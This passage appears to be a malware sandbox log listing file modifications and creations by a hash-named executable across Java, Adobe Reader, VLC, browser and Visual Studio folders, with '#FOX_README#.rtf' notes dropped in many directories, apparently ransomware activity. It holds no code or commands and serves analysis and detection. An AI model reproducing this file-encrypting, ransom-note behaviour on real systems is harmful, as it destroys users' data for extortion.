f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_MoveDrop32x32.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Amsterdam f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX8.x3d f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\view.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Havana f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\SettingsInternal.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\WindowsMedia.mpp f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Caracas f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.resources_3.9.1.v20140825-1431.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Buenos_Aires f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ko.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sa.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Qatar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_win7.css f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javadoc.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-javahelp.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker_1.1.200.v20131119-0908.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedbck2.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\profile.jfc f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Yakutat f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+5 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\currency.data f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunjce_provider.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-execution.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-tabcontrol.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Center f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-keymap.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Troll f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-io-ui.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Saipan f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jvm.lib f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\PST8PDT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.metadata.repository.prefs f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cayman f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Sitka f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\clearkey.dll.sig f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ho_Chi_Minh f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\YST9YDT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-impl.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-io.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\HLS.api f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hovd f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Moscow f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Montreal f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-nodes.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tokyo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\St_Johns f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-spi-quicksearch.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-views.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfoInternal.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\native2ascii.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santiago f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\license.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kuching f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_es.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-nodes.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\LoginForm.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Tunis f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Sitka f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\jfluid-server_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Palau f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-text.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\dsn.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Kiev f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\icudtl.dat f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\San_Luis f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\charsets.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Galapagos f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\cmm\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_70.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Palmer f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\rt.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson_Creek f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\eclipse.inf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvm.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-io_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\Atlantic\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunmscapi.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Paris f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Ceuta f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Cape_Verde f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\dnsns.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.filesystem_1.4.100.v20140514-1614.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\GetOut.xht f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program 